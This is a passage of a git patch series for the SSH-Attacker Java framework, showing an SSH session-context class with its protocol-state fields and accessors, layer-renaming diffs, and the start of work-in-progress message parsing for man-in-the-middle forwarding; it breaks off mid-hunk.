de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import de.rub.nds.tlsattacker.transport.TransportHandler; -import java.util.List; - -public class SshContext2 { - - /** Static configuration for SSH-Attacker */ - private Config config; - - private Chooser chooser; - - /** Connection used to communicate with the remote peer */ - private AliasedConnection connection; - - private TransportHandler transportHandler; - /** If set to true, an exception was received from the transport handler */ - private boolean receivedTransportHandlerException = false; - - /** The currently active packet layer type */ - private PacketLayerType packetLayerType; - /** A layer to serialize packets */ - private AbstractPacketLayer packetLayer; - /** - * If set to true, receive actions will read the incoming byte stream on a per line basis (each - * line is terminated by LF). - */ - private Boolean receiveAsciiModeEnabled; - /** A layer to serialize messages */ - // private MessageLayer messageLayer = new MessageLayer(this); - - /** - * Sequence number used to generate MAC when sending packages. The sequence number is unsigned, - * initialized to 0 and wraps around at 2^32. - */ - private Integer writeSequenceNumber; - /** - * Sequence number used to verify the MAC of received packages. The sequence number is unsigned, - * initialized to 0 and wraps around at 2^32. - */ - private Integer readSequenceNumber; - - /** - * If set to false, messages are handled as a server connection. handleAsClient is used to allow - * handling messages as a different connection end type than the connection end type of the - * fixed connection in the context. This is needed in the handling of mitm/proxy messages. - */ - private boolean handleAsClient; - - // region Version Exchange - /** Client protocol and software version string starting with the SSH version (SSH-2.0-...) */ - private String clientVersion; - /** Client comment sent alongside protocol and software version */ - private String clientComment; - /** End-of-message sequence of the clients' VersionExchangeMessage */ - private String clientEndOfMessageSequence; - /** Server protocol and software version string starting with the SSH version (SSH-2.0-...) */ - private String serverVersion; - /** Server comment sent alongside protocol and software version */ - private String serverComment; - /** End-of-message sequence of the servers' VersionExchangeMessage */ - private String serverEndOfMessageSequence; - - // endregion - - // region Key Exchange Initialization - /** Client cookie containing 16 random bytes */ - private byte[] clientCookie; - /** Server cookie containing 16 random bytes */ - private byte[] serverCookie; - /** List of key exchange algorithms supported by the remote peer */ - private List clientSupportedKeyExchangeAlgorithms; - /** List of key exchange algorithms supported by the server */ - private List serverSupportedKeyExchangeAlgorithms; - /** List of host key algorithms supported by the client */ - private List clientSupportedHostKeyAlgorithms; - /** List of host key algorithms supported by the server */ - private List serverSupportedHostKeyAlgorithms; - /** List of encryption algorithms (client to server) supported by the client */ - private List clientSupportedEncryptionAlgorithmsClientToServer; - /** List of encryption algorithms (server to client) supported by the client */ - private List clientSupportedEncryptionAlgorithmsServerToClient; - /** List of encryption algorithms (client to server) supported by the server */ - private List serverSupportedEncryptionAlgorithmsClientToServer; - /** List of encryption algorithms (server to client) supported by the server */ - private List serverSupportedEncryptionAlgorithmsServerToClient; - /** List of MAC algorithms (client to server) supported by the client */ - private List clientSupportedMacAlgorithmsClientToServer; - /** List of MAC algorithms (server to client) supported by the client */ - private List clientSupportedMacAlgorithmsServerToClient; - /** List of MAC algorithms (client to server) supported by the server */ - private List serverSupportedMacAlgorithmsClientToServer; - /** List of MAC algorithms (server to client) supported by the server */ - private List serverSupportedMacAlgorithmsServerToClient; - /** List of compression algorithms (client to server) supported by the client */ - private List clientSupportedCompressionMethodsClientToServer; - /** List of compression algorithms (server to client) supported by the client */ - private List clientSupportedCompressionMethodsServerToClient; - /** List of compression algorithms (client to server) supported by the server */ - private List serverSupportedCompressionMethodsClientToServer; - /** List of compression algorithms (server to client) supported by the server */ - private List serverSupportedCompressionMethodsServerToClient; - /** List of languages (client to server) supported by the client */ - private List clientSupportedLanguagesClientToServer; - /** List of languages (server to client) supported by the client */ - private List clientSupportedLanguagesServerToClient; - /** List of languages (client to server) supported by the server */ - private List serverSupportedLanguagesClientToServer; - /** List of languages (server to client) supported by the server */ - private List serverSupportedLanguagesServerToClient; - /** - * A boolean flag used to indicate that a guessed key exchange paket will be sent by the client - */ - private Boolean clientFirstKeyExchangePacketFollows; - /** - * A boolean flag used to indicate that a guessed key exchange paket will be sent by the server - */ - private Boolean serverFirstKeyExchangePacketFollows; - /** Value of the clients' reserved field which may be used for extensions in the future */ - private Integer clientReserved; - /** Value of the servers' reserved field which may be used for extensions in the future */ - private Integer serverReserved; - // endregion - - // region Negotiated Parameters - /** Negotiated key exchange algorithm */ - private KeyExchangeAlgorithm keyExchangeAlgorithm; - /** Negotiated host key algorithm */ - private PublicKeyAlgorithm hostKeyAlgorithm; - /** Negotiated encryption algorithm (client to server) */ - private EncryptionAlgorithm encryptionAlgorithmClientToServer; - /** Negotiated encryption algorithm (server to client) */ - private EncryptionAlgorithm encryptionAlgorithmServerToClient; - /** Negotiated MAC algorithm (client to server) */ - private MacAlgorithm macAlgorithmClientToServer; - /** Negotiated MAC algorithm (server to client) */ - private MacAlgorithm macAlgorithmServerToClient; - /** Negotiated compression algorithm (client to server) */ - private CompressionMethod compressionMethodClientToServer; - /** Negotiated compression algorithm (server to client) */ - private CompressionMethod compressionMethodServerToClient; - // endregion - - // region Key Exchange - /** Key exchange instance for static DH key exchange method(s) */ - private DhKeyExchange dhKeyExchangeInstance; - /** Key exchange instance for DH key exchange method(s) with group exchange */ - private DhKeyExchange dhGexKeyExchangeInstance; - /** Key exchange instance for ECDH key exchange method(s) (incl. X curve ECDH) */ - private AbstractEcdhKeyExchange ecdhKeyExchangeInstance; - /** Key exchange instance for RSA key exchange method(s) */ - private RsaKeyExchange rsaKeyExchangeInstance; - /** Key exchange instance for Hybrid key exchange method(s) */ - private HybridKeyExchange hybridKeyExchangeInstance; - /** - * If set to true, the most recent group request received was of type - * DhGexKeyExchangeOldRequestMessage - */ - private boolean oldGroupRequestReceived = false; - /** Minimal acceptable DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ - private Integer minimalDhGroupSize; - /** Preferred DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ - private Integer preferredDhGroupSize; - /** Maximal acceptable DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ - private Integer maximalDhGroupSize; - /** Host key */ - private SshPublicKey hostKey; - /** Signature generated by the server over the exchange hash to authenticate the key exchange */ - private byte[] serverExchangeHashSignature; - /** Flag indicating whether the server exchange hash signature is valid */ - private Boolean serverExchangeHashSignatureValid; - // endregion - - // region Exchange Hash and Cryptographic Keys - /** Holder instance for the exchange hash input values */ - private ExchangeHashInputHolder exchangeHashInputHolder; - /** Exchange hash of the most recent key exchange */ - private byte[] exchangeHash; - /** - * Unique identifier for this session. This is equal to the first computed exchange hash and - * never changes - */ - private byte[] sessionID; - /** The shared secret established by the negotiated key exchange method */ - private byte[] sharedSecret; - /** The key set derived from the shared secret, the exchange hash, and the session ID */ - private KeySet keySet; - // endregion - - // region Connection Protocol - - private ChannelManager channelManager; - - // TODO: Implement channel requests in such a way that allows specification within the XML file - // endregion - - /** If set to true, a SSH_MSG_DISCONNECT has been received from the remote peer */ - private boolean disconnectMessageReceived = false; - /** If set to true, a version exchange message was sent by each side */ - private boolean versionExchangeCompleted = false; - - // DUMMY: - public SshContext2() {} -} - // DUMMY ENDE -/* - // region Constructors and Initalization - public SshContext() { - this(Config.createConfig()); - } - - public SshContext(Config config) { - RunningModeType mode = config.getDefaultRunningMode(); - if (mode == null) { - throw new ConfigurationException("Cannot create connection, running mode not set"); - } else { - switch (mode) { - case CLIENT: - init(config, config.getDefaultClientConnection()); - break; - case SERVER: - init(config, config.getDefaultServerConnection()); - break; - default: - throw new ConfigurationException( - "Cannot create connection for unknown running mode '" + mode + "'"); - } - } - } - - public SshContext(Config config, AliasedConnection connection) { - init(config, connection); - } - - public void init(Config config, AliasedConnection connection) { - this.config = config; - this.connection = connection; - exchangeHashInputHolder = new ExchangeHashInputHolder(); - - // TODO: Initial packet layer type from config - packetLayerType = PacketLayerType.BLOB; - packetLayer = PacketLayerFactory.getPacketLayer(packetLayerType, this); - receiveAsciiModeEnabled = true; - writeSequenceNumber = 0; - readSequenceNumber = 0; - handleAsClient = (connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT); - channelManager = new ChannelManager(this); - } - - // endregion - - public Config getConfig() { - return config; - } - - public Chooser getChooser() { - if (chooser == null) { - chooser = ChooserFactory.getChooser(config.getChooserType(), this, config); - } - return chooser; - } - - public AliasedConnection getConnection() { - return connection; - } - - public void setConnection(AliasedConnection connection) { - this.connection = connection; - } - - public TransportHandler getTransportHandler() { - return transportHandler; - } - - public void setTransportHandler(TransportHandler transportHandler) { - this.transportHandler = transportHandler; - } - - public boolean hasReceivedTransportHandlerException() { - return receivedTransportHandlerException; - } - - public void setReceivedTransportHandlerException(boolean receivedTransportHandlerException) { - this.receivedTransportHandlerException = receivedTransportHandlerException; - } - - public void initTransportHandler() { - if (transportHandler == null) { - if (connection == null) { - throw new ConfigurationException("Connection end not set"); - } - transportHandler = TransportHandlerFactory.createTransportHandler(connection); - } - - try { - transportHandler.preInitialize(); - transportHandler.initialize(); - } catch (NullPointerException | NumberFormatException ex) { - throw new ConfigurationException("Invalid values in " + connection.toString(), ex); - } catch (IOException ex) { - throw new TransportHandlerConnectException( - "Unable to initialize the transport handler with: " + connection.toString(), - ex); - } - } - - public PacketLayerType getPacketLayerType() { - return packetLayerType; - } - - public void setPacketLayerType(PacketLayerType packetLayerType) { - this.packetLayerType = packetLayerType; - } - - public AbstractPacketLayer getPacketLayer() { - return packetLayer; - } - - public void setPacketLayer(AbstractPacketLayer packetLayer) { - this.packetLayer = packetLayer; - } - - public Boolean isReceiveAsciiModeEnabled() { - return receiveAsciiModeEnabled; - } - - public void setReceiveAsciiModeEnabled(boolean receiveAsciiModeEnabled) { - this.receiveAsciiModeEnabled = receiveAsciiModeEnabled; - } - - public MessageLayer getMessageLayer() { - return messageLayer; - } - - public void setMessageLayer(MessageLayer messageLayer) { - this.messageLayer = messageLayer; - } - - // region Getters and Setters for Sequence Numbers - public int getWriteSequenceNumber() { - return writeSequenceNumber; - } - - public void setWriteSequenceNumber(int writeSequenceNumber) { - this.writeSequenceNumber = writeSequenceNumber; - } - - public void incrementWriteSequenceNumber() { - incrementWriteSequenceNumber(1); - } - - public void incrementWriteSequenceNumber(int i) { - // Java does not support native unsigned integers :( - writeSequenceNumber = - (int) - ((Integer.toUnsignedLong(writeSequenceNumber) + Integer.toUnsignedLong(i)) - % DataFormatConstants.UNSIGNED_INT_MAX_VALUE); - } - - public int getReadSequenceNumber() { - return readSequenceNumber; - } - - public void setReadSequenceNumber(int readSequenceNumber) { - this.readSequenceNumber = readSequenceNumber; - } - - public void incrementReadSequenceNumber() { - incrementReadSequenceNumber(1); - } - - public void incrementReadSequenceNumber(int i) { - // Java does not support native unsigned integers :( - readSequenceNumber = - (int) - ((Integer.toUnsignedLong(readSequenceNumber) + Integer.toUnsignedLong(i)) - % DataFormatConstants.UNSIGNED_INT_MAX_VALUE); - } - - // endregion - - // region Getters for Version Exchange Fields - public Optional getClientVersion() { - return Optional.ofNullable(clientVersion); - } - - public Optional getClientComment() { - return Optional.ofNullable(clientComment); - } - - public Optional getClientEndOfMessageSequence() { - return Optional.ofNullable(clientEndOfMessageSequence); - } - - public Optional getServerVersion() { - return Optional.ofNullable(serverVersion); - } - - public Optional getServerComment() { - return Optional.ofNullable(serverComment); - } - - public Optional getServerEndOfMessageSequence() { - return Optional.ofNullable(serverEndOfMessageSequence); - } - - // endregion - // region Setters for Version Exchange Fields - public void setClientVersion(String clientVersion) { - this.clientVersion = clientVersion; - } - - public void setClientComment(String clientComment) { - this.clientComment = clientComment; - } - - public void setClientEndOfMessageSequence(String clientEndOfMessageSequence) { - this.clientEndOfMessageSequence = clientEndOfMessageSequence; - } - - public void setServerVersion(String serverVersion) { - this.serverVersion = serverVersion; - } - - public void setServerComment(String serverComment) { - this.serverComment = serverComment; - } - - public void setServerEndOfMessageSequence(String serverEndOfMessageSequence) { - this.serverEndOfMessageSequence = serverEndOfMessageSequence; - } - // endregion - - // region Getters for Key Exchange Initialization Fields - public Optional getClientCookie() { - return Optional.ofNullable(clientCookie); - } - - public Optional getServerCookie() { - return Optional.ofNullable(serverCookie); - } - - public Optional> getClientSupportedKeyExchangeAlgorithms() { - return Optional.ofNullable(clientSupportedKeyExchangeAlgorithms); - } - - public Optional> getServerSupportedKeyExchangeAlgorithms() { - return Optional.ofNullable(serverSupportedKeyExchangeAlgorithms); - } - - public Optional> getClientSupportedHostKeyAlgorithms() { - return Optional.ofNullable(clientSupportedHostKeyAlgorithms); - } - - public Optional> getServerSupportedHostKeyAlgorithms() { - return Optional.ofNullable(serverSupportedHostKeyAlgorithms); - } - - public Optional> - getClientSupportedEncryptionAlgorithmsClientToServer() { - return Optional.ofNullable(clientSupportedEncryptionAlgorithmsClientToServer); - } - - public Optional> - getClientSupportedEncryptionAlgorithmsServerToClient() { - return Optional.ofNullable(clientSupportedEncryptionAlgorithmsServerToClient); - } - - public Optional> - getServerSupportedEncryptionAlgorithmsServerToClient() { - return Optional.ofNullable(serverSupportedEncryptionAlgorithmsServerToClient); - } - - public Optional> - getServerSupportedEncryptionAlgorithmsClientToServer() { - return Optional.ofNullable(serverSupportedEncryptionAlgorithmsClientToServer); - } - - public Optional> getClientSupportedMacAlgorithmsClientToServer() { - return Optional.ofNullable(clientSupportedMacAlgorithmsClientToServer); - } - - public Optional> getClientSupportedMacAlgorithmsServerToClient() { - return Optional.ofNullable(clientSupportedMacAlgorithmsServerToClient); - } - - public Optional> getServerSupportedMacAlgorithmsServerToClient() { - return Optional.ofNullable(serverSupportedMacAlgorithmsServerToClient); - } - - public Optional> getServerSupportedMacAlgorithmsClientToServer() { - return Optional.ofNullable(serverSupportedMacAlgorithmsClientToServer); - } - - public Optional> getClientSupportedCompressionMethodsClientToServer() { - return Optional.ofNullable(clientSupportedCompressionMethodsClientToServer); - } - - public Optional> getClientSupportedCompressionMethodsServerToClient() { - return Optional.ofNullable(clientSupportedCompressionMethodsServerToClient); - } - - public Optional> getServerSupportedCompressionMethodsServerToClient() { - return Optional.ofNullable(serverSupportedCompressionMethodsServerToClient); - } - - public Optional> getServerSupportedCompressionMethodsClientToServer() { - return Optional.ofNullable(serverSupportedCompressionMethodsClientToServer); - } - - public Optional> getClientSupportedLanguagesClientToServer() { - return Optional.ofNullable(clientSupportedLanguagesClientToServer); - } - - public Optional> getClientSupportedLanguagesServerToClient() { - return Optional.ofNullable(clientSupportedLanguagesServerToClient); - } - - public Optional> getServerSupportedLanguagesServerToClient() { - return Optional.ofNullable(serverSupportedLanguagesServerToClient); - } - - public Optional> getServerSupportedLanguagesClientToServer() { - return Optional.ofNullable(serverSupportedLanguagesClientToServer); - } - - public Optional getClientFirstKeyExchangePacketFollows() { - return Optional.ofNullable(clientFirstKeyExchangePacketFollows); - } - - public Optional getServerFirstKeyExchangePacketFollows() { - return Optional.ofNullable(serverFirstKeyExchangePacketFollows); - } - - public Optional getClientReserved() { - return Optional.ofNullable(clientReserved); - } - - public Optional getServerReserved() { - return Optional.ofNullable(serverReserved); - } - - // endregion - // region Setters for Key Exchange Initialization Fields - public void setClientCookie(byte[] clientCookie) { - this.clientCookie = clientCookie; - } - - public void setServerCookie(byte[] serverCookie) { - this.serverCookie = serverCookie; - } - - public void setClientSupportedKeyExchangeAlgorithms( - List clientSupportedKeyExchangeAlgorithms) { - this.clientSupportedKeyExchangeAlgorithms = clientSupportedKeyExchangeAlgorithms; - } - - public void setServerSupportedKeyExchangeAlgorithms( - List serverSupportedKeyExchangeAlgorithms) { - this.serverSupportedKeyExchangeAlgorithms = serverSupportedKeyExchangeAlgorithms; - } - - public void setClientSupportedHostKeyAlgorithms( - List clientSupportedHostKeyAlgorithms) { - this.clientSupportedHostKeyAlgorithms = clientSupportedHostKeyAlgorithms; - } - - public void setServerSupportedHostKeyAlgorithms( - List serverSupportedHostKeyAlgorithms) { - this.serverSupportedHostKeyAlgorithms = serverSupportedHostKeyAlgorithms; - } - - public void setClientSupportedEncryptionAlgorithmsClientToServer( - List clientSupportedEncryptionAlgorithmsClientToServer) { - this.clientSupportedEncryptionAlgorithmsClientToServer = - clientSupportedEncryptionAlgorithmsClientToServer; - } - - public void setClientSupportedEncryptionAlgorithmsServerToClient( - List clientSupportedEncryptionAlgorithmsServerToClient) { - this.clientSupportedEncryptionAlgorithmsServerToClient = - clientSupportedEncryptionAlgorithmsServerToClient; - } - - public void setServerSupportedEncryptionAlgorithmsServerToClient( - List serverSupportedEncryptionAlgorithmsServerToClient) { - this.serverSupportedEncryptionAlgorithmsServerToClient = - serverSupportedEncryptionAlgorithmsServerToClient; - } - - public void setServerSupportedEncryptionAlgorithmsClientToServer( - List serverSupportedEncryptionAlgorithmsClientToServer) { - this.serverSupportedEncryptionAlgorithmsClientToServer = - serverSupportedEncryptionAlgorithmsClientToServer; - } - - public void setClientSupportedMacAlgorithmsClientToServer( - List clientSupportedMacAlgorithmsClientToServer) { - this.clientSupportedMacAlgorithmsClientToServer = - clientSupportedMacAlgorithmsClientToServer; - } - - public void setClientSupportedMacAlgorithmsServerToClient( - List clientSupportedMacAlgorithmsServerToClient) { - this.clientSupportedMacAlgorithmsServerToClient = - clientSupportedMacAlgorithmsServerToClient; - } - - public void setServerSupportedMacAlgorithmsServerToClient( - List serverSupportedMacAlgorithmsServerToClient) { - this.serverSupportedMacAlgorithmsServerToClient = - serverSupportedMacAlgorithmsServerToClient; - } - - public void setServerSupportedMacAlgorithmsClientToServer( - List serverSupportedMacAlgorithmsClientToServer) { - this.serverSupportedMacAlgorithmsClientToServer = - serverSupportedMacAlgorithmsClientToServer; - } - - public void setClientSupportedCompressionMethodsClientToServer( - List clientSupportedCompressionMethodsClientToServer) { - this.clientSupportedCompressionMethodsClientToServer = - clientSupportedCompressionMethodsClientToServer; - } - - public void setClientSupportedCompressionMethodsServerToClient( - List clientSupportedCompressionMethodsServerToClient) { - this.clientSupportedCompressionMethodsServerToClient = - clientSupportedCompressionMethodsServerToClient; - } - - public void setServerSupportedCompressionMethodsServerToClient( - List serverSupportedCompressionMethodsServerToClient) { - this.serverSupportedCompressionMethodsServerToClient = - serverSupportedCompressionMethodsServerToClient; - } - - public void setServerSupportedCompressionMethodsClientToServer( - List serverSupportedCompressionMethodsClientToServer) { - this.serverSupportedCompressionMethodsClientToServer = - serverSupportedCompressionMethodsClientToServer; - } - - public void setClientSupportedLanguagesClientToServer( - List clientSupportedLanguagesClientToServer) { - this.clientSupportedLanguagesClientToServer = clientSupportedLanguagesClientToServer; - } - - public void setClientSupportedLanguagesServerToClient( - List clientSupportedLanguagesServerToClient) { - this.clientSupportedLanguagesServerToClient = clientSupportedLanguagesServerToClient; - } - - public void setServerSupportedLanguagesServerToClient( - List serverSupportedLanguagesServerToClient) { - this.serverSupportedLanguagesServerToClient = serverSupportedLanguagesServerToClient; - } - - public void setServerSupportedLanguagesClientToServer( - List serverSupportedLanguagesClientToServer) { - this.serverSupportedLanguagesClientToServer = serverSupportedLanguagesClientToServer; - } - - public void setClientFirstKeyExchangePacketFollows( - boolean clientFirstKeyExchangePacketFollows) { - this.clientFirstKeyExchangePacketFollows = clientFirstKeyExchangePacketFollows; - } - - public void setServerFirstKeyExchangePacketFollows( - boolean serverFirstKeyExchangePacketFollows) { - this.serverFirstKeyExchangePacketFollows = serverFirstKeyExchangePacketFollows; - } - - public void setClientReserved(int clientReserved) { - this.clientReserved = clientReserved; - } - - public void setServerReserved(int serverReserved) { - this.serverReserved = serverReserved; - } - - // endregion - - // region Getters for Negotiated Parameters - public Optional getKeyExchangeAlgorithm() { - return Optional.ofNullable(keyExchangeAlgorithm); - } - - public Optional getHostKeyAlgorithm() { - return Optional.ofNullable(hostKeyAlgorithm); - } - - public Optional getEncryptionAlgorithmClientToServer() { - return Optional.ofNullable(encryptionAlgorithmClientToServer); - } - - public Optional getEncryptionAlgorithmServerToClient() { - return Optional.ofNullable(encryptionAlgorithmServerToClient); - } - - public Optional getMacAlgorithmClientToServer() { - return Optional.ofNullable(macAlgorithmClientToServer); - } - - public Optional getMacAlgorithmServerToClient() { - return Optional.ofNullable(macAlgorithmServerToClient); - } - - public Optional getCompressionMethodClientToServer() { - return Optional.ofNullable(compressionMethodClientToServer); - } - - public Optional getCompressionMethodServerToClient() { - return Optional.ofNullable(compressionMethodServerToClient); - } - - // endregion - // region Setters for Negotiated Parameters - public void setKeyExchangeAlgorithm(KeyExchangeAlgorithm keyExchangeAlgorithm) { - this.keyExchangeAlgorithm = keyExchangeAlgorithm; - } - - public void setHostKeyAlgorithm(PublicKeyAlgorithm hostKeyAlgorithm) { - this.hostKeyAlgorithm = hostKeyAlgorithm; - } - - public void setEncryptionAlgorithmClientToServer( - EncryptionAlgorithm encryptionAlgorithmClientToServer) { - this.encryptionAlgorithmClientToServer = encryptionAlgorithmClientToServer; - } - - public void setEncryptionAlgorithmServerToClient( - EncryptionAlgorithm encryptionAlgorithmServerToClient) { - this.encryptionAlgorithmServerToClient = encryptionAlgorithmServerToClient; - } - - public void setMacAlgorithmClientToServer(MacAlgorithm macAlgorithmClientToServer) { - this.macAlgorithmClientToServer = macAlgorithmClientToServer; - } - - public void setMacAlgorithmServerToClient(MacAlgorithm macAlgorithmServerToClient) { - this.macAlgorithmServerToClient = macAlgorithmServerToClient; - } - - public void setCompressionMethodClientToServer( - CompressionMethod compressionMethodClientToServer) { - this.compressionMethodClientToServer = compressionMethodClientToServer; - } - - public void setCompressionMethodServerToClient( - CompressionMethod compressionMethodServerToClient) { - this.compressionMethodServerToClient = compressionMethodServerToClient; - } - - // endregion - - // region Getters for Key Exchange Fields - public Optional getDhKeyExchangeInstance() { - return Optional.ofNullable(dhKeyExchangeInstance); - } - - public Optional getDhGexKeyExchangeInstance() { - return Optional.ofNullable(dhGexKeyExchangeInstance); - } - - public Optional getEcdhKeyExchangeInstance() { - return Optional.ofNullable(ecdhKeyExchangeInstance); - } - - public Optional getHybridKeyExchangeInstance() { - return Optional.ofNullable(hybridKeyExchangeInstance); - } - - public Optional getRsaKeyExchangeInstance() { - return Optional.ofNullable(rsaKeyExchangeInstance); - } - - public boolean isOldGroupRequestReceived() { - return oldGroupRequestReceived; - } - - public Optional getMinimalDhGroupSize() { - return Optional.ofNullable(minimalDhGroupSize); - } - - public Optional getPreferredDhGroupSize() { - return Optional.ofNullable(preferredDhGroupSize); - } - - public Optional getMaximalDhGroupSize() { - return Optional.ofNullable(maximalDhGroupSize); - } - - public Optional> getHostKey() { - return Optional.ofNullable(hostKey); - } - - public Optional getServerExchangeHashSignature() { - return Optional.ofNullable(serverExchangeHashSignature); - } - - public Optional isServerExchangeHashSignatureValid() { - return Optional.ofNullable(serverExchangeHashSignatureValid); - } - // endregion - // region Setters for Key Exchange Fields - public void setDhKeyExchangeInstance(DhKeyExchange dhKeyExchangeInstance) { - this.dhKeyExchangeInstance = dhKeyExchangeInstance; - } - - public void setDhGexKeyExchangeInstance(DhKeyExchange dhGexKeyExchangeInstance) { - this.dhGexKeyExchangeInstance = dhGexKeyExchangeInstance; - } - - public void setEcdhKeyExchangeInstance(AbstractEcdhKeyExchange ecdhKeyExchangeInstance) { - this.ecdhKeyExchangeInstance = ecdhKeyExchangeInstance; - } - - public void setHybridKeyExchangeInstance(HybridKeyExchange HybridKeyExchangeInstance) { - this.hybridKeyExchangeInstance = HybridKeyExchangeInstance; - } - - public void setRsaKeyExchangeInstance(RsaKeyExchange rsaKeyExchangeInstance) { - this.rsaKeyExchangeInstance = rsaKeyExchangeInstance; - } - - public void setOldGroupRequestReceived(boolean oldGroupRequestReceived) { - this.oldGroupRequestReceived = oldGroupRequestReceived; - } - - public void setMinimalDhGroupSize(Integer minimalDhGroupSize) { - this.minimalDhGroupSize = minimalDhGroupSize; - } - - public void setPreferredDhGroupSize(Integer preferredDhGroupSize) { - this.preferredDhGroupSize = preferredDhGroupSize; - } - - public void setMaximalDhGroupSize(Integer maximalDhGroupSize) { - this.maximalDhGroupSize = maximalDhGroupSize; - } - - public void setHostKey(SshPublicKey hostKey) { - this.hostKey = hostKey; - } - - public void setServerExchangeHashSignature(byte[] serverExchangeHashSignature) { - this.serverExchangeHashSignature = serverExchangeHashSignature; - } - - public void setServerExchangeHashSignatureValid(Boolean isValid) { - this.serverExchangeHashSignatureValid = isValid; - } - // endregion - - // region Getters for Exchange Hash and Cryptographic Keys - public ExchangeHashInputHolder getExchangeHashInputHolder() { - return exchangeHashInputHolder; - } - - public Optional getExchangeHash() { - return Optional.ofNullable(exchangeHash); - } - - public Optional getSessionID() { - return Optional.ofNullable(sessionID); - } - - public Optional getSharedSecret() { - return Optional.ofNullable(sharedSecret); - } - - public Optional getKeySet() { - return Optional.ofNullable(keySet); - } - // endregion - // region Setters for Exchange Hash and Cryptographic Keys - public void setExchangeHash(byte[] exchangeHash) { - this.exchangeHash = exchangeHash; - } - - public void setSessionID(byte[] sessionID) { - this.sessionID = sessionID; - } - - public void setSharedSecret(byte[] sharedSecret) { - this.sharedSecret = sharedSecret; - } - - public void setKeySet(KeySet transportKeySet) { - this.keySet = transportKeySet; - } - // endregion - - // region for Connection Protocol Fields - public HashMap getChannels() { - return channelManager.getChannels(); - } - - public ChannelManager getChannelManager() { - return channelManager; - } - - public void setChannelManager(ChannelManager channelManager) { - this.channelManager = channelManager; - } - // endregion - - public boolean isDisconnectMessageReceived() { - return disconnectMessageReceived; - } - - public void setDisconnectMessageReceived(Boolean disconnectMessageReceived) { - this.disconnectMessageReceived = disconnectMessageReceived; - } - - public boolean isVersionExchangeComplete() { - return versionExchangeCompleted; - } - - public void setVersionExchangeComplete(Boolean complete) { - this.versionExchangeCompleted = complete; - } - - public boolean isClient() { - return connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT; - } - - public boolean isServer() { - return connection.getLocalConnectionEndType() == ConnectionEndType.SERVER; - } - - public boolean isHandleAsClient() { - return handleAsClient; - } - - public void setHandleAsClient(boolean handleAsClient) { - this.handleAsClient = handleAsClient; - } - - -}*/ diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 5b112a493..103f5b181 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -318,11 +318,11 @@ private void setContainers(LayerStackProcessingResult processingResults) { .getUsedContainers()); } - if (processingResults.getResultForLayer(ImplementedLayers.Session) != null) { + if (processingResults.getResultForLayer(ImplementedLayers.TransportLayer) != null) { packets = new ArrayList<>( processingResults - .getResultForLayer(ImplementedLayers.Session) + .getResultForLayer(ImplementedLayers.TransportLayer) .getUsedContainers()); } } @@ -352,7 +352,7 @@ private List getGenericReceiveConfigurations(LayerStack laye LayerConfiguration messageSsh1Configuration = new GenericReceiveLayerConfiguration(ImplementedLayers.SSHv1); LayerConfiguration recordConfiguration = - new GenericReceiveLayerConfiguration(ImplementedLayers.Session); + new GenericReceiveLayerConfiguration(ImplementedLayers.TransportLayer); layerConfigurationList = sortLayerConfigurations( layerStack, @@ -376,7 +376,7 @@ private List getSpecificReceiveConfigurations( ImplementedLayers.SSHv1, protocolMessagesToReceive); LayerConfiguration recordConfiguration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.Session, packetsToRecieve); + ImplementedLayers.TransportLayer, packetsToRecieve); if (packetsToRecieve == null || packetsToRecieve.isEmpty()) { // always allow (trailing) records when no records were set // a ReceiveAction actually intended to expect no records is pointless diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index 9c89fd7b5..68f00d907 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -164,9 +164,7 @@ public List sortLayerConfigurations( continue; } Optional layerConfiguration = Optional.empty(); - if (layer == ImplementedLayers.SSHv1 - || layer == ImplementedLayers.SSHv2 - || layer == ImplementedLayers.Session) { + if (layer == ImplementedLayers.SSHv1 || layer == ImplementedLayers.SSHv2) { layerConfiguration = unsortedLayerConfigurations.stream() .filter(layerConfig -> layerConfig.getLayerType().equals(layer)) From fb5822daf044a427b24a02c8ad0f657325fe7f87 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 22 Jul 2023 00:12:50 +0200 Subject: [PATCH 042/176] wip: Mitm working with openssh client and server, some messages are missing --- .../core/layer/impl/SSH2Layer.java | 21 ++++ .../action/ForwardMessagesAction.java | 96 ++++++++++++++++--- .../action/ProxyFilterMessagesAction.java | 2 +- 3 files changed, 107 insertions(+), 12 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index d2edda3ff..22b86e66d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -244,6 +244,16 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_IGNORE: readIngoreMessage(); break; + case SSH_MSG_KEX_ECDH_REPLY: + readKexECDHReply(); + break; + case SSH_MSG_KEX_ECDH_INIT: + readKexECDHInit(); + break; +/* Not Implementended Yet + case SSH_MSG_EXT_INFO: + readExtensionInfo(); + break;*/ default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); throw new RuntimeException(); @@ -660,6 +670,17 @@ private void readIngoreMessage() { readDataContainer(message, context); } + + private void readKexECDHInit() { + EcdhKeyExchangeInitMessage message = new EcdhKeyExchangeInitMessage(); + readDataContainer(message, context); + } + + private void readKexECDHReply() { + 